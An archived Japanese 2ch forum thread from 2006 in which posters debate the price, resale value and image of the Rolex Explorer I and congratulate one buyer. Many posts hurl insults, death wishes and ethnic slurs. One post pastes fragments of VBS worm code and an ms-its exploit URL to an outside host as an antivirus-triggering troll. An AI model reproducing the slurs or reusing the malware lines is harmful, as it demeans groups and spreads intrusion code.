EXP1のようなロレの仲でも最低ラインのモデルが定価の2倍とかアホな値段になったよな。
やっぱ日本人バカだわ、まじ死んだほうがいいね。
世界中のデイトナが日本に集中して、定価の倍でかってるカスがいるかぎり永遠にスイス産業のカモです。
ダサいね日本人。
俺も日本人だけどお前らとは人種が違うね。
ぎゃはははははははは。


216 :Cal.7743:2006/10/29(日) 12:35:07
マルチすんな
死ね

217 :Cal.7743:2006/10/29(日) 13:17:17
>俺も日本人だけどお前らとは人種が違うね

在日ってこと?

218 :Cal.7743:2006/10/29(日) 13:21:00
>>217
お前面白いと思ってんの?糞ニートの低収入の分際でよ。
しかもお前は息がくさい、なんていうかうんちっぽい臭いなんだよなお前。
その癖態度はでかいし、バカだろ?お前・
家族全員で自害しろやカスニートはよw
ぎゃははははっはあっははははははははっはははははははwww

219 :Cal.7743:2006/10/29(日) 14:29:20
>218
お前いろんなところで荒らしてんな
よほど現実では誰からも相手にされて無いんだろうな

220 ::2006/10/29(日) 14:43:12
>>217

俺はウケた。思わず吹き出しちゃったよ。
うまいね。

ところで、デイトナって215(馬鹿)が言うように
日本では価格が倍なの?

デイトナ興味なかったんだけど
こないだコンビの文字盤グレーを
たまたま見て惚れてしまって
どうしようか迷ってます。

あのカラー、雑誌で見るより断然かっこいいです。

221 :Cal.7743:2006/10/29(日) 14:58:16
土方にうってつけ

労力士(ROLEX中国名)

222 :Cal.7743:2006/10/29(日) 22:32:05
>>221
シナは消えろ

223 :Cal.7743:2006/10/29(日) 22:34:03
>>220
コンビだったら並行店で定価以下で売ってるし
正規店でも普通にあるから大丈夫だよ。欲しいならば買うべし。
ロレックスは欲しくなった時が買いどきです。
実際実物持つと後悔しないと思う。少なくとも俺の場合はそうだった。

224 :Cal.7743:2006/10/30(月) 07:53:54
後悔しまくりですが

225 :Cal.7743:2006/10/30(月) 10:18:06
そりゃコンビなんて買ったら後悔しまくりだべ

226 :Cal.7743:2006/10/30(月) 11:29:09
↑後悔しまくったバカ2人↑
買う前に気付けよw

227 :Cal.7743:2006/10/30(月) 11:56:40
在日バカのおかげでスレタイとは
別の方向に話がずれてます。


228 :Cal.7743:2006/10/30(月) 12:08:38
>>226
買えないから後悔も出来ない貧乏人w

229 :Cal.7743:2006/10/30(月) 12:38:35
コンビなんか買わねえよw

230 :Cal.7743:2006/10/30(月) 13:06:38
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
(省略されました・・全てを読むにはここを押してください)




231 :Cal.7743:2006/10/31(火) 01:29:06
46歳 スーツにEX−1 どうでしょうか?

232 :Cal.7743:2006/10/31(火) 01:31:07
>>230
ノートントラップもう飽きたんだけど・・・ノシ

233 :Cal.7743:2006/10/31(火) 01:41:30
>>231
46歳じゃなければなあ。。。残念

234 :Cal.7743:2006/10/31(火) 01:51:52
DJが無難。スポロレにこだわるにしても、せめてEX2にしろ。

235 :Cal.7743:2006/10/31(火) 01:53:49
どうしてもEX1がいいなら1016にしろ。

236 :Cal.7743:2006/10/31(火) 18:37:35
>>234
DJが無難は分かるけど、なんでEX1より、せめてEX2になんの?
そういう僕はEX2にスーツなんやけど。

237 :Cal.7743:2006/10/31(火) 19:35:56
なんでやねんw

238 :Cal.7743:2006/10/31(火) 19:56:16
EX2・・・痛すぎw

239 :Cal.7743:2006/10/31(火) 20:37:36
今日はスーツにデイトナだったけど被らなくていいよ
社内でスーツにパネライのやつ見たけど目立ってたなぁ
エクスプローラーとかDJなら誰も気にしないよ
好きなのつけろ

240 :Cal.7743:2006/11/01(水) 04:05:22
>>238
EX2なんで痛すぎ?なんでやん。

241 :Cal.7743:2006/11/01(水) 04:49:23
漏もEX2は嫌い
特に白盤は5万位にしかみえん

242 :Cal.7743:2006/11/01(水) 05:42:14
EX-1質屋に捨てるほど入ってきます。
そのうえ、売れないので始末が悪いんだよね。

243 :Cal.7743:2006/11/01(水) 05:50:20
キムタバブル崩壊の末期だね
買取り値最低更新?
これからの質の買取り値売値が見物



244 :Cal.7743:2006/11/01(水) 09:02:45
15万でうってた

245 :Cal.7743:2006/11/01(水) 17:02:08
じゃあ買取り値は10万切ったのかな

246 :Cal.7743:2006/11/01(水) 19:37:19
高い時に買って、未だに高く売れると思ってるヤツが多そうな気がするよ

247 :Cal.7743:2006/11/01(水) 22:10:41
70万くらいまで上がったんだっけか?

248 :Cal.7743:2006/11/02(木) 02:05:41
オメガのスピマとどっち買うか迷ってる。どうよ?

249 :Cal.7743:2006/11/02(木) 02:07:23
EX1に限らずロレは十数年周期くらいでブームが来る
裏を返せば安くなる時期もあるので安い時に買って高いときに売ればいい

250 :Cal.7743:2006/11/02(木) 02:09:19
だな!

251 :Cal.7743:2006/11/02(木) 02:24:41
おまえら爺か?

252 :Cal.7743:2006/11/02(木) 02:24:44
雑誌に煽られ高値掴みしたやつはアホ
株や土地と同じだ

253 :Cal.7743:2006/11/02(木) 03:24:55
今の相場ってどんぐり?

254 :Cal.7743:2006/11/02(木) 08:52:35
欲しい人には買いどきだろうね。
また値上がりするよ間違いなく。

255 :Cal.7743:2006/11/02(木) 11:48:53
>>230
バッチリ訴えました!ヒヒヒッ

256 :Cal.7743:2006/11/02(木) 14:27:39
エクスポ1買いました。今日から俺もイケメンです。
よろしく、女の子!

257 :Cal.7743:2006/11/02(木) 16:40:24
>>256おめ

258 :Cal.7743:2006/11/02(木) 18:10:52
はず

259 :Cal.7743:2006/11/03(金) 00:28:06
http://www.evance.co.jp/webcatalog/details.php?id=36

260 :Cal.7743:2006/11/03(金) 00:35:43
http://www.evance.co.jp/webcatalog/details.php?id=36

261 :Cal.7743:2006/11/03(金) 00:43:48
20年前親父がスイスに旅行に行って「お土産」と買ってきたのがEX1。
それ以来こいつは片時も離れず俺と共に時を刻んできた。
結婚式、子どもの出産の立会、大きなディールを取ったビジネス、海外出張、
彼女とのアバンチュール海外ダイビング、オンナとのディナーデイト、祖母の葬式・・・
スーツによし、ジーンズによし、アウトドアキャンプによし、ダイビングでも問題はない。
子どもから孫へ伝える家宝ではない。とことん使い倒す時計だ。
5年ぶりにOHに出した。日差プラス3秒で戻ってきた。
もし、20代のころに戻り、生涯にたったひとつしか時計を持つことを許されなかったら、
俺はEX1をきっと選ぶ。世界広しと言えど、そんな時計はコレしかないのだ。
オンナは沢山欲しい。しかし時計はひとつでいい。



262 :Cal.7743:2006/11/03(金) 07:47:54
>>261
俺と同じだ。。。



263 :Cal.7743:2006/11/03(金) 10:07:04
EX-1は今時ないでしょう、恥ずかしいよ今時していたら。

264 :Cal.7743:2006/11/03(金) 10:11:03
>>261

俺??

265 :Cal.7743:2006/11/03(金) 10:14:59
きんも〜☆

266 :Cal.7743:2006/11/03(金) 11:45:43
20年前ってコトは1016ですかね。

267 :Cal.7743:2006/11/03(金) 12:02:02
今200万円

268 :Cal.7743:2006/11/03(金) 20:46:36
専門店で資産価値があると言われて、つい買っちゃったよ。

269 :Cal.7743:2006/11/03(金) 21:00:52
売れば10万円くらいにはなる資産価値w

270 :Cal.7743:2006/11/03(金) 21:08:00
えっ、そんなー

271 :cal.7743:2006/11/03(金) 21:51:47
zenoで出してるなんちゃってEX-1買ったよ

272 :Cal.7743:2006/11/03(金) 22:40:28
846 名前: Cal.7743 投稿日: 2006/11/02(木) 23:50:46
   20年前親父がスイスに旅行に行って「お土産」と買ってきたのが15000。シルバーダイヤルのやつ。
   それ以来こいつは片時も離れず俺と共に時を刻んできた。
   結婚式、子どもの出産の立会、大きなディールを取ったビジネス、海外出張、
   彼女とのアバンチュール海外ダイビング、オンナとのディナーデイト、祖母の葬式・・・
   数年前、ダイヤルを白ローマンに替え、ベルトをクロコ革に替えてみた。
   スーツによし、ジーンズによし、アウトドアキャンプによし、ダイビングでも問題はない。
   革ベルトは傷むが、痛んだら交換すればいい。
   子どもから孫へ伝える家宝ではない。とことん使い倒す時計だ。
   5年ぶりにOHに出した。日差プラス3秒で戻ってきた。
   もし、20代のころに戻り、生涯にたったひとつしか時計を持つことを許されなかったら、
   俺は15200をきっと選ぶ。世界広しと言えど、そんな時計はコレしかないのだ。
   オンナは沢山欲しい。しかし時計はひとつでいい。


273 :Cal.7743:2006/11/03(金) 22:46:28


682 :Cal.7743:2006/11/03(金) 00:46:00
20年前親父がスイスに旅行に行って「お土産」と買ってきたのがEX2。
それ以来こいつは片時も離れず俺と共に時を刻んできた。
結婚式、子どもの出産の立会、大きなディールを取ったビジネス、海外出張、
彼女とのアバンチュール海外ダイビング、オンナとのディナーデイト、祖母の葬式・・・
スーツによし、ジーンズによし、アウトドアキャンプによし、ダイビングでも問題はない。
子どもから孫へ伝える家宝ではない。とことん使い倒す時計だ。
5年ぶりにOHに出した。日差プラス3秒で戻ってきた。
もし、20代のころに戻り、生涯にたったひとつしか時計を持つことを許されなかったら、
俺はEX2をきっと選ぶ。世界広しと言えど、そんな時計はコレしかないのだ。
オンナは沢山欲しい。しかし時計はひとつでいい。





274 :Cal.7743:2006/11/04(土) 09:49:24
ロレなんてしてる香具師が海外で大きな契約まとめられるわけねーだろ





とマジレス

275 :Cal.7743:2006/11/04(土) 10:27:45
ロレしてるヤツ多いけど、不思議と中身のないヤツが多いな。
人間的につまらないっていうか。
テレビ情報をすぐ鵜呑みにするタイプ。

276 :Cal.7743:2006/11/04(土) 10:30:10
>>275
その説にはもうすぐ終止符がうたれるだろう。
なんせ面白くて有名な俺様がとうとうロレを買おうとしてるからな。
ぎゃははははははははははwwwwwwwwwwwwwwwwwwwwwwwwww
ば〜かwwww

277 :Cal.7743:2006/11/04(土) 20:44:18
俺の大好きな有名人

まずは、貴光岡田
キャプテン、コウジ藤沢
天才Dr、木本マサフミ
秘密兵器、オッパイ潰しとツバキック

278 :Cal.7743:2006/11/15(水) 01:31:35
/::::::::::::::::::::::::::::::::::::::\
 >ミ/         'γ、` ミ    |:::::::::::::;;;;;;|_|_|_|_|
 了| "~`、  "~"`   {,',; ;} 。  |;;;;;;;;;;ノ∪  \,) ,,/ ヽ
 "7 `⌒`   ⌒   }ミ:. {   |::( 6∪ ー─◎─◎ )
  '|   /       レリ*    |ノ  (∵∴ ( o o)∴)
+  i  (       }ィ'     |∪< ∵∵   3 ∵ノ
   `  ー---    /|` +     \       ⌒ ノ
    ヽ  ̄    / |__        \_____/

   GSのイケメン        ロレのヒキオタバカデブ 



279 :Cal.7743:2006/11/24(金) 12:05:16
おっさん時計の代表=GS、DJコンビ

280 :Cal.7743:2006/11/25(土) 00:12:57
俺はEX1買うんならDJのホワイトローマンとかの方が欲しい。
スポロレ(死語?)と言われても、EX1だけはエアキン並みの存在価値にしか見えない。

281 :Cal.7743:2006/11/30(木) 06:47:07
お前の価値観なんて別にどうでもいい

282 :Cal.7743:2006/12/04(月) 23:42:09
キムタク=エクスプローラーが忘れられている今だからこそよい

283 :Cal.7743:2006/12/05(火) 13:14:06
EX1に限らずロレは十数年周期くらいでブームが来る
裏を返せば安くなる時期もあるので安い時に買って高いときに売ればいい


284 :Cal.7743:2006/12/05(火) 21:06:03
俺の友人、当時エヴァで70万で買ってたよ。

285 :Cal.7743:2006/12/05(火) 21:41:08
どこに誤爆?

286 :Cal.7743:2006/12/05(火) 22:28:41
誰が誤爆?

287 :Cal.7743:2006/12/06(水) 14:51:34
>>285
お前知らないんだろ?ブラピがCMしてたころのエバンス。
確かEX1は75万くらいだったかな。

288 :Cal.7743:2006/12/13(水) 15:52:01
三十台半ばです@会社より

中・庶民レベルぐらいです
仕事は、官業寄りです(だから、時計が、あまり目立ちすぎてもいけない)
ある程度、水洗いできる時計を探しています。

そこで、エクスプローラーIの購入(正規品)を考えているのですが、
形は凄く気に入っているのですが、ここでも散々言われているとおり、
流行りすぎた感じで、躊躇しています

その歳になって、自分で決めろと。。と自分でも思うのですが、
こういう買い物は、なかなか、人のアドバイスがないと買えないです


買え!でもいいですし、買うな!でもいいですし、何
かご意見いただけませんでしょうか?>できれば理由も一緒に

ネタではないですので、よろしくお願いいたします


289 :Cal.7743:2006/12/13(水) 16:04:52
出たよ背中押してバカ

290 :Cal.7743 :2006/12/13(水) 16:10:16
俺は白のEPUの方がいい。

291 :Cal.7743:2006/12/13(水) 18:06:25
EXP2でイイと思うよ。今が買い時価格だし(並行)

292 :Cal.7743:2006/12/13(水) 18:16:57
↓これがイイなぁ。サンダーの黒、
ttp://www.sole-net.com/syasinn2/F1492.jpg

それかねぇ、案外とエアキング(青)ってイイと思うよ。散々書かれる
ケド、でもデイト機能は無いからねぇ。。

293 :Cal.7743:2006/12/13(水) 18:57:35
>>289
腹押してやろうよ

294 :Cal.7743:2006/12/19(火) 23:58:02
>>288
エクスプローラーTはいい時計だよ。
「お、ロレックス」と言われるが、「偉そう」とは思われない。
登山で転んで打ち付けたけど、頑丈で壊れない。
登山家で公務員の私にはジャストサイズだと思ってる。

295 :288:2006/12/20(水) 00:35:37
>294

ありがとうございます
本当に買ってきます(^^

実用性とシンプルなデザイン最高です
人気があっても気にしないです、いいもんなんだから

そうそう、職場でチラ判りぐらいでいいんです、引かれちゃ困るし(笑)
「ふーん」ぐらいの対応でいいんです>みなさんわかってくださると思うのですが


買うのが現実味をおびてきて、凄く嬉しい!!!


296 :Cal.7743:2006/12/20(水) 01:07:08
そこまで悩んでまで買う時計じゃないし
傷だらけならまだしも、30代半ばでピカピカのEX1なんて恥ずかしいだけ
素直に新型デイトジャストの黒文字盤買いなよ

297 :Cal.7743:2006/12/20(水) 01:12:07
>>296
おまえのそのピカピカの
童貞ティンコも恥ずかしいぞ。

298 :Cal.7743:2006/12/20(水) 01:16:00
30代半ばで買うなら最新で恥ずかしくない時計がいいって意味で新型DJ推してるのに
ちゃんとアドバイスしてるんだからチャチャ入れんなよ

なんかこういうレス書く奴って本気で哀れに感じる
俺も含めて周りみんな彼女いるか結婚してるし、社会に出てからリアルで童貞とか見たことないんですけど(苦笑)

299 :Cal.7743:2006/12/20(水) 01:18:30
EX1使いの俺たちからみればお前が糞なんだよ!
せっかく欲しいと言ってる方が居るのにチャチャ入れんなカス!
氏ね!

300 :Cal.7743:2006/12/20(水) 01:25:03
いや、同年代だしEX1持ってるからこそのアドバイスなんだけどw
不変のシンプルデザインとはいえ、やっぱり時計には旬ってあるし
今買うならEX1よりも新型DJの方が年齢的に楽しめると思ったんだよ

EX1はやっぱり20代から持って楽しむ時計

301 :Cal.7743:2006/12/20(水) 03:54:24
粘着デブヲタチョリニート乙
脳内所有の彼女にヨロシク

302 :Cal.7743:2006/12/20(水) 07:47:06
二十代で買った俺は勝ち組でよろしいですか?



303 :Cal.7743:2006/12/20(水) 10:15:48
10年前に買って一度もOHに出してない
もちろん健在

304 :299:2006/12/20(水) 11:16:54
>>300
なるほどそうか。
同じEX1オーナーなのに言い過ぎた、スマン。
許してくれよな。


305 :Cal.7743:2006/12/20(水) 12:07:49
>脳内所有の彼女

>>301の惨状が目に浮かびます><
カワイソw

306 :294:2006/12/20(水) 21:45:00
288 オメ

仲間だね。これからも、よろしく。

307 :288:2006/12/20(水) 22:48:38
ありがとうございます
買ってきました

色々悩んだのですが、今、腕につけていて、凄くいいじゃないですか
大満足です!!!

このスレの人が背中押してくれた方もアドバイスくれた方も
ありがとうございました

あと妻に、「これぐらいの時計は、あなたの年齢ならしててもおかしくないから、
買いなよ。もしいらなくなったら私がもらってあげるから」という一言も背中を
押してもらいました

確かに、そんなに大きい金額ではないのですが、いざ買おうとしたら、
躊躇するという感覚はあったのですが、これはこれで私の金銭感覚として
大事にしておこうと思います

ちなみに、6時のswissの辺りにあるクラウンのマーク、本当に肉眼では
見えないのですが。。。(視力が落ちたのかなぁ)

正規品です


308 :Cal.7743:2006/12/21(木) 07:48:10
>>307

正規品購入おめ☆

王冠透かしは何気ない時とかに見えるもんだよ。
俺も114270を手に入れた時は嬉しかったな…

(/▽\) 照。

大事にね!

309 :Cal.7743:2006/12/21(木) 11:42:31
37歳が正規でエクスプローラT買っちゃったんだ・・・

すっげえ馬鹿だなオイ

310 :Cal.7743:2006/12/21(木) 12:06:59
>309
本当の事をはっきり言うな
本人は満足してるんだぞ
知らぬが仏とも言うしな

311 :Cal.7743:2006/12/21(木) 12:14:13
30代半ばであって37歳じゃないな
スマンw

でも馬鹿だろう
会社でも陰で笑われるなw

312 :Cal.7743:2006/12/21(木) 19:14:04
>288
大体このスレに購入相談するのが間違いだろ
アンチEX1スレなんだから
購入報告なんてしたら
こういう反応も当然あるだろ

313 :Cal.7743:2006/12/21(木) 21:46:46
なんだ、またスピマス厨が妬んで暴れてんのか。
ここで煽ってるお前らにはEX1は高嶺の華だもんなw

314 :Cal.7743:2006/12/21(木) 22:18:39
>>313
ヒント:
スピマスもEX1も
目糞鼻糞
もしくわ
50歩100歩

315 :Cal.7743:2006/12/21(木) 23:13:06
両方持ってる漏れは目鼻糞もしくわ150歩

316 :Cal.7743:2006/12/21(木) 23:14:43
>>313
ちなみに馬鹿にした漏れは両方持ってる

でも馬鹿じゃん
30代半ばで正規でエクスプローラT買うって
笑える

317 :Cal.7743:2006/12/22(金) 00:08:36
EX1なんて鼻くそ時計
ただでもイラネ

318 :Cal.7743:2006/12/22(金) 00:12:41
>>317
誰もヤラネ

319 :Cal.7743:2006/12/22(金) 00:25:52
鼻くそ時計すら買えない>>317に幸あれ

320 :Cal.7743:2006/12/22(金) 13:41:30
アンチってどーして書き込みすんのよ?
スルー出来ないお馬鹿ちゃんなの?

321 :Cal.7743:2006/12/22(金) 14:00:50
本当は気になって仕方がないから書き込むのです。許してください

322 :Cal.7743:2006/12/22(金) 18:31:37
恥ずかしい時計のひとつがEX1だ

323 :Cal.7743:2006/12/22(金) 18:49:55
まだサブノンデイトの方が良い。

324 :Cal.7743:2006/12/22(金) 18:50:55
別にEX1持っていても恥ずかしくないだろ。
持っている人間しだいじゃないか?
月給50万の庶民がしてたら恥ずかしいだろうな。

325 :Cal.7743:2006/12/22(金) 19:00:47
それからそれから。

326 :Cal.7743:2006/12/22(金) 23:25:36
>324
お前の月給いくらだよ?


327 :Cal.7743:2006/12/23(土) 00:01:33
たったの120だよ。職業はAV男優だ。

本も出そうかと思ってる。 印税でロイヤルオークでも買おうかな。

328 :Cal.7743:2006/12/23(土) 00:03:40
なんだ、ブルーカラーかw

329 :Cal.7743:2006/12/23(土) 00:16:37
下手な釣だなおい

330 :Cal.7743:2006/12/23(土) 11:09:14
月給J50万でもボーナス年間6ヵ月、その他決算賞与や配当等で年収1000万越える。
それでも120万×12だとしたら負けてるが、なんたって会社辞めなければ定年まで働けるし退職金や会社の株等で老後も安泰だよ。


331 :Cal.7743:2006/12/23(土) 23:06:47
以上、フリーターの妄想でした おしまい

332 :Cal.7743:2006/12/24(日) 02:39:28
>>330
すんげー羨ましい。ボーナスの手取り48万だったよ勤続20年になるのに

333 :Cal.7743:2006/12/24(日) 03:24:48
会社潰れて賃金未払いですが何か?
泣き・・・

334 :Cal.7743:2006/12/25(月) 04:21:32
店舗経営やってて年収約2200万。
貯蓄、その他副業で老後は安泰。


53 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)